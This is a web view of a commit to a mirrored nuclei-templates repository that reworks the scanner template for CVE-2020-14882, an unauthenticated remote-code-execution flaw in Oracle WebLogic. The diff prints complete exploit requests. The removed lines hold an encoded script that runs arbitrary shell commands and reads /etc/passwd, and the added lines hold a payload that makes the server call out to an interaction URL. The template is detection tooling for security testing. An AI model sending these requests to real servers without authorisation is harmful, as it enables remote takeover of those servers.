daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3218 from projectdiscovery/CVE-2020-14882-fix 

Fixed CVE-2020-14882 payload + matcher
patch-1
Sandeep Singh 2021-11-29 01:59:06 +05:30 committed by GitHub
parent 0f5d673186 682db62431
commit b66fb32adb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
cves/2020/CVE-2020-14882.yaml
View File

@ -17,7 +17,7 @@ info:
Easily exploitable vulnerability allows unauthenticated Easily exploitable vulnerability allows unauthenticated
attacker with network access via HTTP to compromise the server. attacker with network access via HTTP to compromise the server.
Successful attacks of this vulnerability can result in takeover. Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic tags: cve,cve2020,oracle,rce,weblogic,oast
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80 cvss-score: 9.80
@ -28,25 +28,19 @@ requests:
- | - |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}")
payloads:
exec:
- "type C:\\Windows\\win.ini" # Windows
- "cat /etc/passwd" # *nix
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
condition: or part: header
regex: words:
- "root:.*:0:0:" - "ADMINCONSOLESESSION"
- "\\[(font|extension|file)s\\]"
- type: status - type: word
status: part: interactsh_protocol
- 200 words:
- "http"